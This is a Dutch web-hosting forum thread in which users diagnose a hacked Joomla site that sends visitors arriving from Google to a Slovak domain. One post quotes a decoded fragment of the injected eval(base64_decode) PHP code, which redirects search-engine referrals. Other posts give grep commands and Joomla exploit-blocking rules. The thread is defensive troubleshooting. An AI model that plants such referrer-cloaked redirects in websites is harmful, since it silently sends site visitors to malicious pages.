Likes Likes:  0
Resultaten 1 tot 14 van de 14
Geen
  1. #1
    Link in Google hacked?
    geregistreerd gebruiker
    11 Berichten
    Ingeschreven
    18/03/12

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked



    Thread Starter

    Link in Google hacked?

    Hallo,

    Eén van mijn klanten heeft een website www.fietseling.org
    Als men deze url in de browser intikt (met of zonder www), komt men gewoon op de website terecht.
    Als men echter in Google zoekt op "Fietseling" en je klikt in de zoekresultaten op de link die naar deze site verwijst, komt je op een totaal andere site terecht.
    .htaccess nagekeken en niks opmerkelijks te zien.
    Weet iemand hoe dit mogelijk is?

    Bij voorbaat dank

  2. #2
    Link in Google hacked?
    geregistreerd gebruiker
    550 Berichten
    Ingeschreven
    19/09/05

    Locatie
    Arnhem

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    49 Berichten zijn liked


    Naam: Aleksandar Skodric
    Bedrijf: Atomia AB
    Functie: Sales Engineer
    URL: atomia.com
    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt
    View http://nl.linkedin.com/pub/aleksandar-skodric/21/414/59a/'s profile on LinkedIn

    Ik kom rechtstreeks of via google op een en dezelfde website;
    misschien recent iets met de DNS gedaan, waardoor je browser / ISP nog e.e.a. in cache heeft staan? Eigen hosts file misschien?

    Getest vanaf een zakelijke UPC abonnement trouwens.

  3. #3
    Link in Google hacked?
    geregistreerd gebruiker
    73 Berichten
    Ingeschreven
    04/11/12

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    17 Berichten zijn liked



    Dit klinkt als een soort virus die zoekresultaten manipuleert. Geef anders de website aan ons en dan Googlen wij met je mee?

  4. #4
    Link in Google hacked?
    geregistreerd gebruiker
    35 Berichten
    Ingeschreven
    03/06/13

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    2 Berichten zijn liked


    Bedrijf: NixDevs
    Functie: Sales
    URL: nixdevs.com
    KvK nummer: 57398968

    Ik kom op: http://www.zahradnictvogreen-za.sk/l...s/www/all2.php terecht. Dit van af een Linux Box en via google.
    Via duckduckgo kom ik wel op de goede website terecht: https://duckduckgo.com/?q=www.fietseling.org
    Laatst gewijzigd door NixDevs.com; 02/07/13 om 12:43.
    NixDevs : http://www.nixdevs.com { We maintain, optimize, secure your Linux Servers }

  5. #5
    Link in Google hacked?
    Geregistreerd Gebruiker
    4.755 Berichten
    Ingeschreven
    23/04/05

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    15 Post(s)
    Tagged
    0 Thread(s)
    353 Berichten zijn liked


    Naam: Toin Bloo
    Bedrijf: Dommel Hosting
    URL: www.dommelhosting.nl
    ISPConnect: Lid
    KvK nummer: 17177247

    Ik kom ook in .sk uit.

  6. #6
    Link in Google hacked?
    geregistreerd gebruiker
    270 Berichten
    Ingeschreven
    01/03/12

    Locatie
    Drachten

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    41 Berichten zijn liked


    Naam: Martijn Spiekman
    View martijnspiekman's profile on LinkedIn

    Ook hier getest en kom uit op de .sk.

  7. #7
    Link in Google hacked?
    geregistreerd gebruiker
    550 Berichten
    Ingeschreven
    19/09/05

    Locatie
    Arnhem

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    49 Berichten zijn liked


    Naam: Aleksandar Skodric
    Bedrijf: Atomia AB
    Functie: Sales Engineer
    URL: atomia.com
    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt
    View http://nl.linkedin.com/pub/aleksandar-skodric/21/414/59a/'s profile on LinkedIn

    Kleine update vanaf mijn kant;
    via Google.nl kom ik op goede website uit;
    via Google.com kom ik ook uit op .sk domein :S

    ===

    wil je anders hier _complete_ .htaccess laten zien?
    Dit hebben we (bij onze technische dienst) al eerder gezien. Wat we dan merken is dat .htaccess gedupliceerd wordt, waarbij ze groot aantal lege regels zetten - en dan onderaan het redirect. Kan eventueel ook in de php code ook zitten.
    Laatst gewijzigd door SmilieBG; 02/07/13 om 13:15.

  8. #8
    Link in Google hacked?
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    Dit spook gebeuren kan ook in een image zitten waarbij ze de image coden in base64, en afhankelijk van de criteria forwarden / aanpassen.
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  9. #9
    Link in Google hacked?
    geregistreerd gebruiker
    561 Berichten
    Ingeschreven
    10/06/06

    Locatie
    Emmeloord

    Post Thanks / Like
    Mentioned
    14 Post(s)
    Tagged
    0 Thread(s)
    21 Berichten zijn liked


    Naam: Arie

    De client krijgt een "302 Moved Temporarily" als je via google bezoekt.

    Code:
    Connection	Keep-Alive
    Content-Length	0
    Content-Type	text/html
    Date	Tue, 02 Jul 2013 12:51:33 GMT
    Keep-Alive	timeout=1, max=100
    Location	http://www.zahradnictvogreen-za.sk/language/pdf_fonts/www/all2.php
    Server	Apache/2
    Vary	User-Agent
    X-Powered-By	PHP/5.3.26
    Grote kans dat het in een php file zit dus. En die dan kijkt of je bijv. via google komt, om geen argwaan te wekken bij de eigenaar die alleen via de URL zelf bezoekt.

  10. #10
    Link in Google hacked?
    geregistreerd gebruiker
    11 Berichten
    Ingeschreven
    18/03/12

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked



    Thread Starter
    Hallo,
    dit is de htacces.
    ##
    # @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
    # @package Joomla
    # @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
    # @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
    # Joomla! is Free Software
    ##


    ################################################## ###
    # READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
    #
    # The line just below this section: 'Options +FollowSymLinks' may cause problems
    # with some server configurations. It is required for use of mod_rewrite, but may already
    # be set by your server administrator in a way that dissallows changing it in
    # your .htaccess file. If using it causes your server to error out, comment it out (add # to
    # beginning of line), reload your site in your browser and test your sef url's. If they work,
    # it has been set by your server administrator and you do not need it set here.
    #
    ################################################## ###

    ## Can be commented out if causes errors, see notes above.
    Options +FollowSymLinks

    #
    # mod_rewrite in use

    RewriteEngine On

    ########## Begin - redirect naar www
    RewriteCond %{HTTP_HOST} !^www\.
    RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]


    ########## Begin - Rewrite rules to block out some common exploits
    ## If you experience problems on your site block out the operations listed below
    ## This attempts to block the most common type of exploit `attempts` to Joomla!
    #
    ## Deny access to extension xml files (uncomment out to activate)
    #<Files ~ "\.xml$">
    #Order allow,deny
    #Deny from all
    #Satisfy all
    #</Files>
    ## End of deny access to extension xml files
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    # Block out any script trying to base64_encode crap to send via URL
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
    # Block out any script that includes a <script> tag in URL
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    # Block out any script trying to set a PHP GLOBALS variable via URL
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    # Block out any script trying to modify a _REQUEST variable via URL
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # Send all blocked request to homepage with 403 Forbidden error!
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## End - Rewrite rules to block out some common exploits

    # Uncomment following line if your webserver's URL
    # is not directly related to physical file paths.
    # Update Your Joomla! Directory (just / for root)

    # RewriteBase /


    ########## Begin - Joomla! core SEF Section
    #
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_URI} !^/index.php
    RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
    RewriteRule (.*) index.php
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
    #
    ########## End - Joomla! core SEF Section

  11. #11
    Link in Google hacked?
    geregistreerd gebruiker
    11 Berichten
    Ingeschreven
    18/03/12

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked



    Thread Starter
    @Mikey
    Kunnen we dat ergens nakijken of dat ergens in een image zit?

    @Arieh
    Kunnen we ergens nakijken dat er een php file daarvoor gebruikt wordt?

    Bedankt

  12. #12
    Link in Google hacked?
    Allrounder
    1.420 Berichten
    Ingeschreven
    18/04/06

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    27 Berichten zijn liked


    Naam: Maarten
    Bedrijf: Keizer IT
    URL: keizer.it
    Registrar SIDN: ja
    KvK nummer: 56981139

    Dit zie ik heel vaak, maar zit bijna altijd in de .htaccess. Zit er niet stiekem nog een .htaccess onder de public_html?

    SSH toegang?

    Code:
    find . -name=".htaccess" | xargs grep google
    find . -name="*.php" | xargs grep google
    find . | xargs grep zahradnictvogreen
    find . -name "*.php" | xargs grep base64_decode
    Laatst gewijzigd door Keizer; 02/07/13 om 16:56.

  13. #13
    Link in Google hacked?
    geregistreerd gebruiker
    11 Berichten
    Ingeschreven
    18/03/12

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked



    Thread Starter
    @Keizer
    Ik vind niet direct een andere .htaccess file terug.

    Maar ik vind wel veel php files terug waar inderdaad een stuk code staat in het begin:
    eval(base64_decode("DQplcnJvcl9yZXBvc ...

    Als ik dat stuk code door een decoder haal, zie je inderdaad perfect de rerouting naar die .sk site en checking op zoekmachines:
    ...
    /",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: http://www.zahradnictvogreen-za.sk/language/pdf_fonts/www/all2.php");
    exit();
    }
    }

    We zullen dus die complete site moeten restoren met een oude backup, want blijkbaar zijn alle php files geinfecteerd met die code :-(
    En dan weten we nog niet hoe dit gekomen is.

    Alvast bedankt om me naar de oorzaak te leiden.

  14. #14
    Link in Google hacked?
    geregistreerd gebruiker
    580 Berichten
    Ingeschreven
    26/01/09

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    58 Berichten zijn liked


    Naam: Wim
    Registrar SIDN: nee

    De lijst is lang:

    http://evuln.com/labs/www.zahradnictvogreen-za.sk/

    Schijnt een --OUD-- Joomla probleem te zijn:

    http://forum.joomla.org/viewtopic.php?f=621&t=804444

    Phishing waarschijnlijk, van een groep die al lang bezig is en slim redirect. Alleen eerste bezoekers met een zekere config krijgen iets geserveerd. De rest wordt geweigerd. Grappig genoeg geven dus online malware scanners zoals VirusTotal deze link als "safe" weer.

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics